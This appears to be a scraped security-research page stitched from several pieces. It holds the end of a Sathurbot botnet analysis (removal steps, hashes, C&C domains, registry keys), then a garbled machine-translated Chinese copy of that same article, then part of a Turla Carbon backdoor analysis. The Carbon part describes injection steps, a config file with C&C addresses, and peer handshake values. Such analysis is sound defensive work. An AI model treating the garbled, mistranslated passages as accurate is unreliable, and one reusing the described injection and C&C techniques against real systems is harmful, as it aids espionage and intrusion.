Removal

Web Admins – Change passwords, remove subpages not belonging to site, optionally wipe and restore the site from a backup.

Users – Using a third-party file manager find the suspect .DLL (note that the files and directories have the hidden attribute set), open Process Explorer or Task Manager, kill explorer.exeand/or rundll32.exe, delete (quarantine) the affected .DLL, reboot.

Note: this will remove Sathurbot only, and not any other malware it may have also downloaded.

Alternatively, consider a comprehensive anti-malware product, or at least an online scanner.

Prevention

Web Admins – Should the normal functioning of the website not require the XML-RPC API, you are advised to disable it and use complex passwords.

Users – Avoid both running executables downloaded from sources other than those of respected developers, and downloading files from sites not designed primarily as file-sharing sites.

IoCs

Currently, we have observed Sathurbot installing to:

\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll

\ProgramData\Microsoft\Performance\TheftProtection\TheftProtection.dll

\ProgramData\Microsoft\Performance\Monitor\SecurityHelper.dll

\Users\*****\AppData\Local\Microsoft\Protect\protecthost.dll

Runs in the context of rundll32.exe or explorer.exe process and locks files and registry keys from editing. It is present in both x32 and x64 bit versions in the installer.

Subfolders to the above (contain the seeded files by torrent)
\SecurityCache\cache\resume\
\SecurityCache\cache\rules\
\SecurityCache\data\
\SecurityCache\zepplauncher.mif – contains the DHT nodes
\temp\

%appdata%\SYSHashTable\ – contains folders representing the hashes of visited domains
%appdata%\SYSHashTable\SyshashInfo.db – collection of interesting domains found incl. framework info

Samples (SHA-1)

Installers:
2D9AFB96EAFBCFCDD8E1CAFF492BFCF0488E6B8C
3D08D416284E9C9C4FF36F474C9D46F3601652D5
512789C90D76785C061A88A0B92F5F5778E80BAA
735C8A382400C985B85D27C67369EF4E7ED30135
798755794D124D00EAB65653442957614400D71D
4F52A4A5BA897F055393174B3DFCA1D022416B88
8EDFE9667ECFE469BF88A5A5EBBB9A75334A48B9
5B45731C6BBA7359770D99124183E8D80548B64F
C0F8C75110123BEE7DB5CA3503C3F5A50A1A055E
C8A514B0309BCDE73F7E28EB72EB6CB3ABE24FDD
AF1AE760F055120CA658D20A21E4B14244BC047D
A1C515B965FB0DED176A0F38C811E6423D9FFD86
B9067085701B206D2AC180E82D5BC68EDD584A8B
77625ADEA198F6756E5D7C613811A5864E9874EA
Sathurbot dll:
F3A265D4209F3E7E6013CA4524E02D19AAC951D9
0EA717E23D70040011BD8BD0BF1FFAAF071DA22C
2381686708174BC5DE2F04704491B331EE9D630B
2B942C57CEE7E2E984EE10F4173F472DB6C15256
2F4FAA5CB5703004CA68865D8D5DACBA35402DE4
4EBC55FDFB4A1DD22E7D329E6EF8C7F27E650B34
0EF3ECD8597CE799715233C8BA52D677E98ABDFD
0307BBAC69C54488C124235449675A0F4B0CCEFA
149518FB8DE56A34B1CA2D66731126CF197958C3
3809C52343A8F3A3597898C9106BA72DB7F6A3CB
4A69B1B1191C9E4BC465F72D76FE45C77A5CB4B0
5CCDB41A34ADA906635CE2EE1AB4615A1AFCB2F2
6C03F7A9F826BB3A75C3946E3EF75BFC19E14683
8DA0DC48AFB8D2D1E9F485029D1800173774C837
AC7D8140A8527B8F7EE6788C128AFF4CA92E82C2
E1286F8AE85EB8BD1B6BE4684E3C9E4B88D300DB

Additional payloads:

C439FC24CAFA3C8008FC01B6F4C39F6010CE32B6
ABA9578AB2588758AD34C3955C06CD2765BFDF68
DFB48B12823E23C52DAE03EE4F7B9B5C9E9FDF92
FAFF56D95F06FE4DA8ED433985FA2E91B94EE9AD
B728EB975CF7FDD484FCBCFFE1D75E4F668F842F
59189ABE0C6C73B66944795A2EF5A2884715772E
C6BDB2DC6A48136E208279587EFA6A9DD70A3FAA
BEAA3159DBE46172FC79E8732C00F286B120E720
5ED0DF92174B62002E6203801A58FE665EF17B76
70DFABA5F98B5EBC471896B792BBEF4DB4B07C53
10F92B962D76E938C154DC7CBD7DEFE97498AB1E
426F9542D0DDA1C0FF8D2F4CB0D74A1594967636
AA2176834BA49B6A9901013645C84C64478AA931
1C274E18A8CAD814E0094C63405D461E815D736A
61384C0F690036E808F5988B5F06FD2D07A87454
F32D42EF1E5ED221D478CFAA1A76BB2E9E93A0C1
594E098E9787EB8B7C13243D0EDF6812F34D0FBA
1AAFEBAA11424B65ED48C68CDEED88F34136B8DC
BA4F20D1C821B81BC324416324BA7605953D0605
E08C36B122C5E8E561A4DE733EBB8F6AE3172BF0
7748115AF04F9FD477041CB40B4C5048464CE43E
3065C1098B5C3FC15C783CDDE38A14DFA2E005E4
FA25E212F77A06C0B7A62C6B7C86643660B24DDA
FADADFFA8F5351794BC5DCABE301157A4A2EBBCF
B0692A03D79CD2EA7622D3A784A1711ADAABEE8D
9411991DCF1B4ED9002D9381083DE714866AEA00

Associated domains

DNS:
zeusgreekmaster.xyz
apollogreekmaster.xyz

C&C:
jhkabmasdjm2asdu7gjaysgddasd.xyz
boomboomboomway.xyz
mrslavelemmiwinkstwo.xyz
uromatalieslave.space
newforceddomainisherenow.club
justanotherforcedomain.xyz
artemisoslave.xyz
asxdq2saxadsdawdq2sasaddfsdfsf4ssfuckk.xyz
kjaskdhkaudhsnkq3uhaksjndkud3asds.xyz
badaboommail.xyz

Torrent trackers:
badaboomsharetracker.xyz
webdatasourcetraffic.xyz
sharetorrentsonlinetracker.xyz
webtrafficsuccess.xyz

Registry values

You may need to use a third-party tool, as Windows Regedit might not even show these:

HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{variable GUID} = “v2.10|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|App=C:\\Windows\\explorer.exe|Name=Windows Explorer|”

HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{variable GUID} = “v2.10|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|App=C:\\Windows\\system32\\rundll32.exe|Name=Windows host process (Rundll32)|”

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\0TheftProtectionDll = {GUID1}
HKLM\SOFTWARE\Classes\CLSID\{GUID1} = “Windows Theft Protection”
HKLM\SOFTWARE\Classes\CLSID\{GUID1}\InprocServer32 = “C:\\ProgramData\\Microsoft\\Performance\\TheftProtection\\TheftProtection.dll”
HKLM\SOFTWARE\Classes\CLSID\{GUID1}\InprocServer32\ThreadingModel = “Apartment”

HKLM\SOFTWARE\Classes\CLSID\{GUID2}

The {GUID2} entries are variable across samples and have 6 char long subkeys, content is binary type and encrypted – used to store variables, temporary values and settings, IP’s, C&C’s, UID

e.g. {GUID2} entries look like

HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000003
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000002
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000001
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000009
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000011
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00010001
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00010002
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000008
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000007
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000004
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000010
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00020001

BENWEN揭示了当前生态系统sathurbot后门木马,特别是在其使用的种子作为输送介质及其分布式蛮弱的WordPress的管理员帐户的强迫。HACKERSCHINA

torrent下载者

想不付钱就下载一部电影或软件?可能会有相关的风险。它很可能会发生,你最喜欢的搜索引擎返回到正常无关的文件共享网站Torrent链接。他们可以,但是,运行WordPress和已经被攻破。

一些搜索结果的例子:

点击那些链接返回以下页面(注意,有的甚至使用HTTPS):

这部电影的子页面都导致相同的torrent文件;而所有软件的子页面导致另一个torrent文件。当你开始在你的喜爱torrenting BT客户端,你会发现文件是好种子,从而出现合法。如果你下载电影的洪流,其内容将与视频延长伴有明显的编解码器包的安装程序文件,并解释文本文件。该软件包含了一个明显的安装程序可执行文件和洪流的一个小的文本文件。两者的目的都是让让受害者运行可执行文件加载DLL的sathurbot。

在你开始执行,你会有这样的消息:

当你思考你的选择,不好的事情开始发生在背景。你刚刚成为BOTsathurbot网络

后门和下载

在启动时,sathurbot检索与C的一个查询的DNS。该反应是一个DNS的TXT等记录。它的字符串值解密作为C &#38; C状态报告域名,任务检索到其他恶意软件下载链接。

sathurbot可以自我更新和下载和启动其他可执行文件。我们已经看到的变化boaxxeKovterfleercivet,但这不一定是一个详尽的列表。

的sathurbot然后报告其成功安装在一个监听端口的C&C的定期报告到C和C,它是活得很好,等待额外的任务。

网络爬虫

sathurbot附带一些5000再加上基本的通用词。这些都是随机组合形成2-4字词组合作为通过谷歌查询字符串,Bing搜索引擎Yandex。

从网页在每一个这样的搜索结果网址,随机2-4词长文本块选择(这次可能是更有意义的因为它是从真实文本)和用于搜索查询下一轮。

最后,搜索结果的第二集(第三页)收获的域名。

提取的域名都是随后探讨由WordPress框架创建。这里的诀窍是检查响应的URLhttp://〔〕/wp-login.php _名字域

随后该域的根目录页取了其他框架的存在。换句话说,他们也感兴趣:Drupal、Joomla,php-nuke,phpfox,和dedecms。

在启动时,或在一定的时间间隔,收获的域发送到C和C(一个不同的域是用比借壳–硬编码的一个)。

分布式的WordPress的密码攻击

客户现在可以得到一个列表域访问凭据(格式为登录名:密码@域)探讨密码。在Sathurbot的僵尸网络不同的机器人尝试不同的登录凭据相同的网站。每个机器人只尝试每网站和移动单点登录。这种设计有助于确保BOT没有IP地址被列入黑名单的任何目标网站,可以重温它的未来。

在我们的测试中,探讨10000项列表是由C和C返回

对于攻击本身的XML-RPC APIWordPress是使用。特别是wp.getusersblogsAPI的滥用。一个典型的请求看起来像:

探索一个数域凭据如下图所示的序列:

响应进行评估和结果发布到C和C

洪流客户端,播种机

BOT具有libtorrent图书馆集成和任务之一是成为一个播种机–二进制文件下载、创建和种子的种子。

BitTorrent的引导

完成周期从吸血一个非自愿的播种机

注:在网络不是每个BOT是执行所有的功能,有些只是网络爬虫,有的只是攻击XML-RPC API,有的做。而且,并不是每一个BOT似乎是播种的洪流。

影响

上述的尝试wp-login.php /从众多的用户,甚至网站不主机WordPress的,是sathurbot的直接影响。许多网站管理员观察和想知道为什么会发生。此外,WordPress网站可以看到潜在的攻击wp.getusersblogs在他们的日志

通过检查日志,系统构件和文件,僵尸网络由超过20000受感染的计算机,至少从六月2016活跃。

偶尔,我们看到Torrent链接通过电子邮件发送以及。

检测

网络管理员–检查服务器上的未知的子页面和/或目录。如果他们有任何引用洪流下载提供,检查和可能的后门攻击日志。

用户–运行Wireshark的滤波器http.request没有浏览器打开看到太多的要求,喜欢wp-login.php /和/或邮政/ xmlrpc.php。另外,检查文件或注册表项在国际奥委会部分上市,下面。

ESET用户免受这一威胁的多层次。

搬家公司

网络管理员–修改密码,删除不属于网站的子页面,随意擦拭,从备份中恢复的网站。

用户–使用第三方的文件管理器找到嫌犯。DLL(注意,文件和目录都有隐藏属性设置),打开进程管理器、任务管理器,杀死explorer.exe和/或rundll32.exe,删除(检疫)的影响。DLL,启动。

注意:这将删除sathurbot而已,并没有任何其他恶意软件可能还下载了。

另外,考虑全面的反恶意软件产品,或者至少是一个在线扫描

预防

网络管理员–应该正常运作的网站不需要XML-RPC API,建议您禁用它并使用复杂的密码。

用户–避免运行的可执行文件从其他来源比尊重开发者下载,并不是设计作为主要的文件共享网站的站点下载文件。

IOC

目前,我们已经观察到sathurbot安装:

programdata \ Microsoft \ \ \ \ performancemonitor.dll性能监视器

\下\微软\ \ \ theftprotection.dll theftprotection性能

\下\微软\ \ \ securityhelper.dll性能监控

\用户\ ***** \ AppData \地方\微软\保护\ protecthost.dll

运行中rundll32.exe或Explorer.exe进程锁和编辑文件和注册表键。它是在安装x32和x64位版本目前。

子文件夹,以上(含种子文件的洪流)
securitycache \ \ \ \缓存摘要
\ \ \ \ securitycache缓存规则
securitycache日期\ \ \
“securitycache \ zepplauncher.mif–包含DHT节点
\温度\

syshashtable %APPDATA%directory \ \–包含表示哈希文件夹访问域
syshashtable %APPDATA%directory \ \ syshashinfo.db–收集有趣的领域,包括框架的信息

Carbon Paper: Peering into Turla’s second stage backdoor窥视Turla的第二阶段的后门

The Turla espionage group has been targeting various institutions for many years. Recently, we found several new versions of Carbon, a second stage backdoor in the Turla group arsenal. Last year, a technical analysis of this component was made by Swiss GovCERT.ch as part of their report detailing the attack that a defense firm owned by the Swiss government, RUAG, suffered in the past.

This blog post highlights the technical innovations that we found in the latest versions of Carbon we have discovered.

Looking at the different versions numbers of Carbon we have, it is clear that it is still under active development. Through the internal versions embedded in the code, we see the new versions are pushed out regularly. The group is also known to change its tools once they are exposed. As such, we have seen that between two major versions, mutexes and file names are being changed.

Infection vectors

The Turla group is known to be painstaking and work in stages, first doing reconnaissance on their victims’ systems before deploying their most sophisticated tools such as Carbon.

A classic Carbon compromise chain starts with a user receiving a spearphishing email or visiting a previously compromised website, typically one that the user visits regularly — a technique known as a watering hole attack.

After a successful attack, a first stage backdoor — such as Tavdig[1]or Skipper[2]— is installed on the user machine. Once the reconnaissance phase is over, a second stage backdoor, like Carbon, is installed on key systems.

Technical analysis

Carbon is a sophisticated backdoor used to steal sensitive information from targets of interest by the Turla group.

This malware shares some similarities with “Uroburos”[3], a rootkit used by the same group. The most relevant resemblance is the communication framework. Indeed, both of them provide communication channels between different malware components. The communication objects are implemented in the same way, the structures and vtables look identical except that there are fewer communication channels provided in Carbon. Indeed, Carbon might be a “lite” version of Uroburos (without kernel components and without exploits).

For Turla group to decide to install Carbon on a system, a (stage 1) recognition tool is usually delivered first to the target: this tool collects several pieces of information about the victim’s machine and its network (through Tavdig or Skipper for example). If the target is considered interesting enough, it will receive more sophisticated malware (such as Carbon or Uroburos).

Global architecture

The Carbon framework consists of:

  • a dropper that installs the carbon components and its configuration file
  • a component that communicates with the C&C
  • an orchestrator that handles the tasks, dispatches them to other computers on the network and injects into a legitimate process the DLL that communicates with the C&C
  • a loader that executes the orchestrator

Carbon Dating

The orchestrator and the injected library have their own development branch.

Thanks to the compilation dates and the internal versions numbers hardcoded in the PE files, we might have the following timeline:

Table 1 – Carbon development timeline

Carbon files

The files from the Carbon framework can have different names depending on the version but they all keep the same internal name (from the metadata) regardless of the version:

  • the dropper: “SERVICE.EXE”
  • the loader: “SERVICE.DLL” or “KmSvc.DLL”
  • the orchestrator: “MSIMGHLP.DLL”
  • the injected library: “MSXIML.DLL”

Each of these files exist in 32bit and in 64bit versions.

Working directory

Several files are created by Carbon to keep logs, tasks to execute and configuration that will modify the malware’s behavior. The contents of the majority of these files are encrypted with the CAST-128 algorithm[4].

A base working directory will contain the files/folders related to Carbon. This directory is chosen randomly among the folders in %ProgramFiles% but excluding “WindowsApps”.

The filenames are hardcoded in the orchestrator. The same names are used in the 3.7x+ branch. Because the injected library accesses the same files as the orchestrator, it is another easy way to link a library version and an orchestrator.

Carbon 3.7x files tree view:
\%carbon_working_folder\%   // base folder├── 0208 // tasks results and logs files│   ├── C_56743.NLS // contains list of files to send to the C&C server, this file is neither compressed nor encrypted├── asmcerts.rs├── getcerts.rs├── miniport.dat  // configuration file├── msximl.dll    // injected library (x32)├── Nls // contains tasks (commands to be executed or PE file) and their configuration files│   ├── a67ncodc.ax  // tasks to be executed by the orchestrator│   ├── b9s3coff.ax  // tasks to be executed by the injected library├── System   // plugins folder│   ├── bootmisc.sdi // not used├── qavscr.dat    // error log├── vndkrmn.dic   // log└── ximarsh.dll   // injected library (x64)

Since version 3.80, all filenames have changed.

Carbon 3.8x files tree view:
\carbon_working_folder\%   // base folder├── 0409  // contains tasks (commands to be executed or PE file) and their configuration files│   ├── cifrado.xml    // tasks to be executed by the injected library│   ├── encodebase.inf // tasks to be executed by the orchestrator├── 1033 // tasks results and logs files│   ├── dsntype.gif // contains list of files to send to the C&C server, this file is neither compressed nor encrypted├── en-US  // plugins folder│   ├── asmlang.jpg // not used├── fsbootfail.dat  // error log├── mkfieldsec.dll  // injected library (x32)├── preinsta.jpg    // log├── wkstrend.xml    // configuration file├── xmlrts.png└── zcerterror.png

File access

In the case of the majority of the files from the Carbon working folder, when one is accessed by the malware, the following steps are taken:

  • a specific mutex is used to ensure its exclusive access.
  • the file is decrypted (CAST-128)
  • when the operations on the file are done, the file is reencrypted (CAST-128)
  • the mutex is released

Mutexes

The following mutexes are created by the orchestrator in Carbon 3.7x:

  • “Global\\MSCTF.Shared.MUTEX.ZRX” (used to ensure exclusive access to “vndkrmn.dic”)
  • “Global\\DBWindowsBase” (used to ensure exclusive access to “C_56743.NLS”)
  • “Global\\IEFrame.LockDefaultBrowser” (used to ensure exclusive access to “b9s3coss.ax”)
  • “Global\\WinSta0_DesktopSessionMut” (used to ensure exclusive access to “a67ncodc.ax”)
  • “Global\{5FA3BC02-920F-D42A-68BC-04F2A75BE158}” (used to ensure exclusive access to new files created in “Nls” folder)
  • “Global\\SENS.LockStarterCacheResource” (used to ensure exclusive access to “miniport.dat”)
  • “Global\\ShimSharedMemoryLock” (used to ensure exclusive access to “asmcerts.rs”)

In carbon 3.8x, the filenames and the mutex names have changed:

  • “Global\\Stack.Trace.Multi.TOS” (used to ensure exclusive access to “preinsta.jpg”)
  • “Global\\TrackFirleSystemIntegrity” (used to ensure exclusive access to “dsntype.gif”)
  • “Global\\BitswapNormalOps” (used to ensure exclusive access to “cifrado.xml”)
  • “Global\\VB_crypto_library_backend” (used to ensure exclusive access to “encodebase.inf”)
  • “Global\{E41B9AF4-B4E1-063B-7352-4AB6E8F355C7}” (used to ensure exclusive access to new files created in “0409” folder)
  • “Global\\Exchange.Properties.B” (used to ensure exclusive access to “wkstrend.xml”)
  • “Global\\DatabaseTransSecurityLock” (used to ensure exclusive access to “xmlrts.png”)

These mutexes are also used in the injected dll to ensure that the orchestrator has been executed.

Configuration File

The configuration file affects the malware’s behavior. The file format is similar to “inf” files used by Windows. It contains among others:

  • an “object_id” that is a unique uuid used to identify the victim, when the value is not set in the file, it is generated randomly by the malware
  • a list of processes into which code is injected (iproc)
  • the frequency and time for task execution / backup logs / connection to the C&C ([TIME])
  • the IP addresses of other computers on the network ([CW_LOCAL])
  • the C&C server addresses ([CW_INET])
  • the named pipes used to communicate with the injected library and with the other computers ([TRANSPORT])

This file might be updated later. Indeed, in the communication library, some cryptographic keys are used to encrypt/decrypt data and these keys are retrieved from a section [CRYPTO] in the configuration file that does not exist when the file is dropped from the loader resources.

Carbon 3.77 configuration file:
[NAME]object_id=iproc = iexplore.exe,outlook.exe,msimn.exe,firefox.exe,opera.exe,chrome.exeex = #,netscape.exe,mozilla.exe,adobeupdater.exe,chrome.exe[TIME]user_winmin = 1800000user_winmax = 3600000sys_winmin = 3600000sys_winmax = 3700000task_min = 20000task_max = 30000checkmin = 60000checkmax = 70000logmin =  60000logmax = 120000lastconnect=111timestop=active_con = 900000time2task=3600000[CW_LOCAL]quantity = 0[CW_INET]quantity = 3address1 = doctorshand.org:80:/wp-content/about/address2 = www.lasac.eu:80:/credit_payment/url/address3 = www.shoppingexpert.it:80:/wp-content/gallery/[TRANSPORT]system_pipe = comnapspstatus = yesadaptable = no[DHCP]server = 135[LOG]logperiod = 7200[WORKDATA]run_task=run_task_system=

Logfile

The Carbon framework includes a logfile that is used to log actions performed by the malware and information on the system that can be useful to the malware operator (for example if an analysis tool such as WireShark is running on the machine).

The log’s format has not changed since Carbon 3.71:

  • Date|Time|Object-Id|Source|Message
example
[LOG]start=120/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|OPER|New object ID generated '8hTdJtUBB57ieReZAOSgUYacts'|20/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|ST|3/81|0|20/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|START OK

This file is periodically backed up and sent to the C&C.

Dropper

The dropper is the only executable that is not a DLL. It is the first PE file to be executed: it is used to extract the other components from its resources.

The PE files that are used to load the main components are extracted into the Windows system directory while the orchestrator, the library used to communicate with the C&C and the configuration file are extracted into the Carbon working directory.

A new section is appended into a random “.inf” file from %SystemRoot%\INF. The section’s name is the volume serial disk number of the compromised machine and a value “root” is created with the chosen Carbon working directory.

Example:
[5049654F]root="C:\Program Files\Windows Portable Devices"

Loader

This part of the component is used to load the orchestrator.

A service that ensures Carbon’s persistency is created. Its name can either be “srservice”, “ipvpn” or “hkmsvc” depending of the operating system version running on the compromised machine.

The Carbon working directory is retrieved by walking through the “%windir%\inf” folder and looking for the file that contains the Carbon base path.

Last but not least, the function “ModuleStart” (in Carbon 3.71) or “ModStart” (since Carbon 3.77) from the orchestrator (located in the Carbon base folder) is called.

Orchestrator

The orchestrator is the main component of the Carbon framework. It is mainly used to inject code into a process that communicates legitimately over the Internet and to dispatch the tasks received from the injected library to other computers on the same network either through named pipes or TCP.

Seven threads are created by the malware. It is easy to identify Carbon’s characteristics because each thread has a specific role:

Configuration fetching

Because the configuration file can be updated by the malware, some attributes like the C&C server addresses are monitored every 10 minutes.

Check Carbon storage folder periodically

There is a storage folder located in the Carbon working directory. This folder contains some files downloaded from the C&C server (tasks that are either commands to be executed or PE files, and their configuration files).

This thread will run continuously and check every two hours[5]whether there is still enough space available in this folder; if not, a notification is written into the logfile.

Task execution

The execution of the tasks in the context of the orchestrator process is very similar to the way in which it is performed in the communication library (cf Communication library / Tasks execution).

Unlike the communication library, it is the file “encodebase.inf” (for Carbon v3.8x) or “a67ncode.ax” that contains the list of the tasks to execute.

Each line of this file is composed in the following way:

  • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath | [execution_mode | username | password]

The five first fields are required, while the last three are optional. If the field “execution_mode” exists, its value will affect the way the task is executed:

  • 0 or 1: normal execution
  • 2: the task is executed in the security context of a specific user (credentials are provided through the username/password fields)
  • 3 or 4: the task is executed in the security context of the user represented by the “explorer.exe” token

P2P

Like Uroburos/Snake, Carbon can dispatch tasks to other computers from the same network via named pipe or TCP. It is useful to be able to dispatch and execute tasks on computers that do not have Internet access.

Communication channels

Uroburos used several types of communication transports than can be categorized as follows:

  • type 1: TCP
  • type 2: enc, np, reliable, frag, m2b, m2d
  • type 3: t2m
  • type 4: UDP, doms, domc

Carbon uses a reduced number of communication channels:

  • type 1: TCP, b2m
  • type 2: np, frag, m2b

The data sent to peers are usually fragmented and transported either by TCP or via a named pipe. If, for example, fragmented data are sent from a computer to another one by a named pipe, an object “frag.np” is set up. In this case the mother class “frag” constructor will be called followed by a call to the constructor subclass “np”.

There is a structure composed of several handlers for each objects: initialize communication, connection (to a pipe / IP address), read data, send data etc.

How a task is forwarded to another computer

Several steps are performed to send data from one computer to another:

  • a communication channel is created (frag.np or frag.tcp object) with a specific named pipe / ip address
  • options are given to the object communication (for example : the fragment’s size, information about the peer etc.)
  • connection to the peer
  • an authentication step is performed between the host and the peer:
    • there is a handshake process where the host is sending the “magic” value “A110EAD1EAF5FA11” and expects to receive “C001DA42DEAD2DA4” from the peer
    • a command “WHO” is sent to the peer where the host sends the victim uuid and expects to receive the same uuid
  • if the authentication was successful, the data are sent to the peer

All the communication between the host and the peer are encrypted with CAST-128

Note that this P2P feature is also implemented in the communication DLL.

Plugins

This malware supports additional plugins to extend its functionalities.

In the configuration file, there is a section named “PLUGINS”. It might not exist when the configuration file is dropped from the loader resources but this file can be updated by the malware. The section “PLUGINS” contains a line formed this way:

  • %plugin_name%=%enabled%|%mode%[:%username%:%password%]|%file_path%

%file_path% can be either the path to a PE file or to a file containing a command line to be executed. %enabled% is a string that is used to know if the plugin has to be executed. If it is the case, that string value is “enabled”.

The attribute %mode% is used to control the context in which to execute the PE file/command line. It can be either:

  • 1 = execution with current user privilege in the current process context through CreateProcess().
  • 2 = execution as the user specified in the configuration (:%username%:%password% attributes), the token of this specific user is retrieved through the LogonUserAs() function.
  • 3 = execution in the security context of the user represented by the “explorer.exe” token (the token of the process “explorer.exe” is duplicated and passed through the CreateProcessAsUser() function.
  • 4 = similar than 3 but the environment variables for the user represented by the “explorer.exe” token are retrieved and passed to the function CreateProcessAsUser()

If it is a PE file:

  • the file is loaded into the malware process memory
  • the module is parsed to check if it is a DLL
  • if the module is a DLL and exports a function “ModStart” (since Carbon 3.77) or “ModuleStart” (for older versions of Carbon), a new thread is created to execute this function.
  • if the module is not a DLL but a valid PE, it is executed from the entry point.

Injection of the communication library into remote processes

The library that is used to communicate with the C&C server is injected into remote processes. In order to know where to inject this DLL, the configuration file is parsed. The section “[NAME]” contains a field “iproc” containing a list of processes that can legitimately communicate to Internet.

Example:
[NAME]iproc = iexplore.exe,outlook.exe,msimn.exe,firefox.exe,opera.exe,chrome.exe

For each process on the list that is running on the system, if its parent process name is either “explorer.exe” or “ieuser.exe”, the DLL will be injected into this process.

The process injection is very classical:

  • the functions “CreateToolHelp32Snapshot / Module32FirstW / Module32NextW” are used to retrieve the base address of the module “kernel32.dll”
  • the module EAT is parsed to get the address of the function “LoadLibraryW”
  • the privilege “SeDebugPrivilege” is enabled for the current process
  • memory is allocated into the remote process and the library path is written into it
  • NtCreateThreadEx or CreateRemoteThread (if the address of the first function cannot be retrieved) is called to execute LoadLibraryW to load the DLL into the memory of the remote process *

Communication library

The following analysis is based on the version 4.x of msximl. This component may have changed in the latest versions.

Configuration fetching

Besides the code in the “Configuration fetching” thread from the orchestrator (which is similar), a field “sethttp1” is retrieved from the [TRANSPORT] section.

If this value is set, HTTP 1.1 will be used for future connections.

Tasks execution

The tasks are retrieved from the C&C server.

The tasks to be executed by the communication library are listed in the file “b9s3coff.ax” (for Carbon v3.7x) or “cifrado.xml” (for Carbon v3.8x).

Each line of this file is composed in the following way:

  • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath

The task file and its config are decrypted (CAST-128) and the task executed. There are some options that are retrieved from the Carbon configuration file: “time2task” is used to set a timeout for the task execution (1 hour by default) while “task_min” and “task_max” are used as to wait a random time between the execution of the tasks on the task list (the random time will be set between “task_min” and “task_max”). These parameters come from the section [TIME].

If the task is a valid DLL file, it is loaded in the current process memory and a new thread is created to execute its “start” export. Otherwise, this is probably a command to execute. In this case, the configuration file is parsed. Like the Carbon configuration file, the task configuration file is formed as a windows “inf” file and should contain a section [CONFIG] with the following parameters:

  • [CONFIG]
    • NAME (“cmd.exe” by default)
    • ARG
    • RESULT (“stdout” by default)
    • COMPRESSION (“yes” by default)
    • DELETE (“no” by default)

The command with its arguments is executed through CreateProcess() function and the results are stored in the %task_result_filepath% file if the RESULT option is not set to “stdout”, while error or additional info are added to the task logfile.

If the option RESULT is set to stdout:

  • the result task file is deleted and the task execution output is written to the log task file
  • the line “task_id | “1” | task_log_filepath | object_id” is added at the end of the file “C_56743.NLS” (Carbon 3.7x) or “dsntype.gif” (Carbon 3.8x)

Otherwise:

  • the task execution is outputted to the task result file and the errors / additional info to the task logfile
  • the line “task_id | “2” | task_log_filepath | task_result_filepath | object_id” is added at the end of the file “C_56743.NLS” (Carbon 3.7x) or “dsntype.gif” (Carbon 3.8x)

In both cases, the same line as written into “C_56743.NLS” is also written into the field “run_task” from the Carbon configuration file. It might be intended as a way for the malware authors to know which is the last task executed when the configuration file is sent to the C&C server (check “Configuration file backup”).

Log rotation

The logfile is backed up and sent to the C&C server periodically (by default this is done every two hours).

Like the backup of the configuration file, this action is performed only during specific times of the day.
Indeed, the log rotation will be performed only when the current local time is in the range of what is defined in the configuration file.

The fields “wh_min” and “wh_max” are retrieved from the [TIME] section of the configuration file (by default: 8 and 20). The thread will execute the code only if the current hour of the day is between %wh_min% and %wh_max%.

If there is a value for the attribute “timestop” from the [TIME] section (which looks like “wDay:wMonth:wYear:wHour:wMinute”), the thread will execute the code only after this specific datetime.

The attributes “lastsend” and “logperiod” from the [LOG] section are used to specify a delay time when to backup and send the log to the C&C server. (by default: every two hours).

A temporary file with a random name prefixed by “~D” is created in the folder “208” (for Carbon v3.7x) or “1033” (for Carbon v3.8x). The logfile content is copied into this new file. It is then compressed with Bzip2 and encrypted (CAST-128).

A new line is added at the end of the file “C_56743.NLS” (for Carbon v3.7x) or “dsntype.gif” (for Carbon v3.8x):

  • “10|1|%s|%s”
    • 1st field: an ID to identify the file as a logfile
    • 2nd field: 1 (file to be sent to the C&C server)
    • 3rd field: the temp file path
    • 4rd field: the victim uuid

Last but not least, the attribute “lastsend” is updated with the current time and the original logfile is deleted.

Communication with the C&C server

The code of this thread is used to retrieve new tasks from the C&C server, to send new files to the server (the files listed in the file “C_56743.NLS” / “dsntype.gif”) and to send the new tasks to the orchestrator.

First request

A random C&C server address is chosen from the ones in the section “CW_INET”. If the port and HTTP resource path are not specified, the default is to use port 80 and “/javascript/view.php”.

A user agent is set up in the following way:

  • the version of Internet Explorer is retrieved through the registry key: “HKLM\Software\Microsoft\Internet Explorer\Version” and is concatenated to the string “Mozilla/4.0 (compatible; MSIE %d.0; ”
    • example: “Mozilla/4.0 (compatible; MSIE 8.0.6001.18702.0;”
  • concatenate the previous string with the OS major/minor version values (through GetVersionExA())
    • “Mozilla/4.0 (compatible; MSIE 8.0.6001.18702.0; Windows NT 5.1; Trident/4.0”
